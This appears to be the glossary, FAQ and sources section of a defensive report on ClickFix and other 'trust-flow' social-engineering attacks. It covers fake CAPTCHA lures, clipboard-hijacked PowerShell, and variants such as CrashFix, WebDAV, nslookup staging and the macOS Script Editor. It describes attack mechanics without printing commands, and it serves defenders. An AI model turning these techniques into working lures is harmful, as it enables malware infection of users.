Trust-flow attack. A social engineering category in which attackers disguise the malicious action inside a workflow the user trusts and expects to be safe. Examples include CAPTCHA verification, browser error remediation, account verification, security checks, and login flows. ClickFix is the most prominent technique within the category in 2026, but trust-flow attacks are not limited to ClickFix. Fake tech support workflows, OAuth and SSO consent phishing, watering-hole-adjacent verification scams, and mobile QR-code device-linking schemes all share the structural pattern: a context that feels safe, a request that feels routine, and a workflow that ends with the user having performed the attacker's action. The term is offered as a useful shorthand for a pattern that is well-recognised but has not had a single shared label.

Trust-flow describes the human side of the attack, the workflow the user is induced to follow. MITRE ATT&CK describes the technical side, the specific commands and system interfaces the attack uses. Both are useful and they describe different things.

URL scheme handler. A registered relationship between a URL prefix (such as applescript://, ms-msdt:, or vscode://) and an application that opens when that prefix is invoked. Multiple ClickFix variants weaponise URL scheme handlers to invoke applications with attacker-controlled content.

WDAC (Windows Defender Application Control). A Windows feature that restricts which applications and scripts can run on a system based on explicit allow rules. The highest-impact single control against ClickFix on Windows when applied to PowerShell and script interpreters.

WebDAV. A file-sharing protocol built into Windows that lets a remote folder appear as a local drive. The 2026 WebDAV ClickFix variant abuses this to map an attacker-controlled remote share and execute a hosted batch file.

Win+R / Run Dialogue. The Windows command box that opens when a user presses the Windows key and R simultaneously. The original ClickFix variant's execution interface.

Win+X. A Windows shortcut that opens the Power User menu. The 2026 Windows Terminal ClickFix variant uses Win+X then I to launch Windows Terminal directly.

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering technique that tricks users into executing malicious commands on their own computers. Attackers use fake CAPTCHA prompts, browser errors, or document viewer problems to convince victims to open the Windows Run dialogue and paste a PowerShell command that has been silently copied to their clipboard. Microsoft identified ClickFix as the number one initial access method in 2025, responsible for 47% of observed attacks.

How does a ClickFix attack work?

The attack follows three steps. First, a fake prompt appears on a webpage claiming the user needs to verify their identity or fix a problem. Second, malicious code is silently copied to the user's clipboard through JavaScript on the page. Third, the user is instructed to press Windows+R, Ctrl+V, and Enter, which executes the hidden malicious command. The entire sequence takes seconds and bypasses most automated security controls because the user initiates the execution.

What is a trust-flow attack?

A trust-flow attack is a social engineering attack that disguises the malicious action inside a workflow the user trusts and expects to be safe. ClickFix is the most prominent example, but the category includes fake tech support workflows, OAuth and SSO consent phishing, and mobile QR-code device-linking schemes. The defining feature is that the user perceives the interaction as completing a security or verification step rather than as performing a risky action.

What malware does ClickFix deliver?

The most common payload is Lumma Stealer, responsible for 51% of observed infections (Microsoft, 2025). Other frequently delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, ModeloRAT, MIMICRAT, and Atomic Stealer (macOS). Recent campaigns have also delivered ransomware-enabling payloads.

Can ClickFix target Mac and Linux users?

Yes. ClickFix affects all major operating systems. macOS campaigns have historically directed users to paste commands into Terminal. The April 2026 Script Editor variant uses the applescript:// URL scheme to bypass Terminal entirely, auto-opening Script Editor with a pre-loaded malicious script that the user runs by clicking a button. Linux systems are also targeted through terminal-based command execution. ESET confirmed cross-platform targeting in their H1 2025 report.

What is CrashFix?

CrashFix is a ClickFix variant identified by Huntress in January 2026. It uses a malicious Chrome extension that deliberately crashes the browser, then displays a fake security warning offering to "fix" the problem. Unlike standard ClickFix which fakes errors, CrashFix creates a genuine browser crash, making the social engineering more convincing. It delivers ModeloRAT and specifically targets corporate domain-joined machines.

How do I protect my organisation against ClickFix?

The most effective defence combines three measures: restrict PowerShell and script execution for non-administrative users through Group Policy or WDAC, train employees to question the flow when a familiar workflow takes an unusual turn rather than just recognising specific tools, and deploy detection rules for ClickFix execution patterns. Microsoft recommends building ClickFix-specific response playbooks rather than relying on generic phishing training.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) targeting government, defence, and think tank organisations between late 2024 and early 2025. The rapid adoption by state-sponsored groups confirms the technique's effectiveness against security-aware targets.

Is ClickFix the same as phishing?

ClickFix is a form of social engineering but differs from traditional phishing. Phishing typically delivers malware through email attachments or malicious links that trigger automatic downloads. ClickFix requires the user to manually execute the command through a system tool like PowerShell or Terminal. Many email security controls that catch phishing do not detect ClickFix because the execution originates from a trusted user action.

References and Sources

  1. Microsoft. (2025). 2025 Digital Defense Report. ClickFix identified as the number one initial access method, accounting for 47% of observed attacks by Defender Experts. Traditional phishing accounted for 35%.
  2. ESET. (2025, June). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks. Confirmed ClickFix builders are sold commercially.
  3. Microsoft. (2025, August). Think Before You Click(Fix): Analyzing the ClickFix social engineering technique. Microsoft Threat Intelligence's deep technical breakdown covering LOLBin abuse, fileless payload delivery, and detection patterns observed across thousands of monthly ClickFix incidents.
  4. Proofpoint. (2024, June). From Clipboard to Compromise: A PowerShell Self-Pwn. Initial documentation of ClickFix emergence by TA571 and ClearFake cluster.
  5. Proofpoint. (2024, November). ClickFix Social Engineering Technique Floods Threat Landscape. Documentation of expanded ClickFix activity beyond TA571.
  6. Proofpoint. (2025, April). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by TA427 (Kimsuky), TA450 (MuddyWater), TA422 (APT28), and UNK_RemoteRogue.
  7. Recorded Future Insikt Group. (2026, March). ClickFix Campaigns Targeting Windows and macOS. Five-cluster activity analysis covering QuickBooks, Booking.com, Birdeye, dual-platform selection, and macOS storage cleaning clusters.
  8. Center for Internet Security. (2025, October). ClickFix: An Adaptive Social Engineering Technique. Documented ClickFix as over a third of non-malware Albert Network alerts in H1 2025 against US SLTT victims, with August 2025 Interlock ransomware incident.
  9. Huntress. (2026, January). Dissecting CrashFix: KongTuke's New Toy. Discovery of CrashFix variant, NexShield malicious extension, and ModeloRAT deployment targeting corporate environments.
  10. Microsoft Security Blog. (2026, February). New ClickFix Variant "CrashFix" Deploying Python Remote Access Trojan. Microsoft confirmed CrashFix and described it as a "notable escalation in ClickFix tradecraft" combining browser disruption with social engineering. Documents finger.exe abuse for the staging command.
  11. Microsoft Threat Intelligence. (2026, February). DNS-based ClickFix attack using nslookup for malware staging (initial disclosure via @msftsecurity). Replaces typical PowerShell download with nslookup command retrieving payload through DNS responses.
  12. Microsoft Threat Intelligence. (2026, March). Windows Terminal (wt.exe) ClickFix campaign delivering Lumma Stealer via hex-encoded PowerShell commands and QueueUserAPC injection. Disclosed 6 March 2026.
  13. Palo Alto Networks Unit 42. (2025). Fix the Click: Preventing the ClickFix Attack Vector. Unit 42 assisted in nearly a dozen IR cases with ClickFix as initial access. Documented IUAM ClickFix Generator phishing kit (active July-October 2025) blocking mobile traffic.
  14. Elastic Security Labs. (2026, February). MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites. MIMICRAT campaign analysis via compromised bincheck[.]io site deploying previously undocumented RAT with ETW patching.
  15. Atos. (2026, March). Investigating a New Click-Fix Variant. Documented WebDAV variant using net use to map attacker-controlled remote shares, evading Microsoft Defender for Endpoint.
  16. Jamf Threat Labs. (2026, April). ClickFix Malware Uses macOS Script Editor to Deliver Atomic Stealer. Primary research documenting Script Editor variant using applescript:// URL scheme to bypass Terminal.
  17. Malwarebytes. (2026, April). ClickFix finds a new way to infect Macs. Coverage of the Script Editor variant.
  18. Bleeping Computer. (2026, February). QuickLens Chrome extension steals crypto, shows ClickFix attack. Compromised extension introduced ClickFix attacks and crypto wallet theft in version 5.8 update.
  19. Bitdefender. (2025, December). ClickFix: A KISS from Cybercriminals. Analysis of EDR detection challenges, fileless execution patterns, and Lumma Stealer delivery through ClickFix.
  20. Sekoia. (2025, March). Lazarus ClickFake Interview Campaign: From Contagious to ClickFix Malware Tactics. North Korean Lazarus Group campaign targeting cryptocurrency company applicants with GolangGhost backdoor.
  21. Sekoia. (2024, October). ClickFix tactic: The Phantom Meet. Early documentation of ClickFix variants using fake video conferencing pages.
  22. Trend Micro. (2026, March). Through the Lens of MDR: Analysis of KongTuke's ClickFix Abuse of Compromised WordPress Sites. KongTuke campaign delivering ModeloRAT through compromised WordPress sites and fake CAPTCHA lures.
  23. MITRE ATT&CK. T1204.004 Malicious Copy and Paste. Sub-technique added to capture the ClickFix copy-paste pattern, with ClickFix named in the technique description.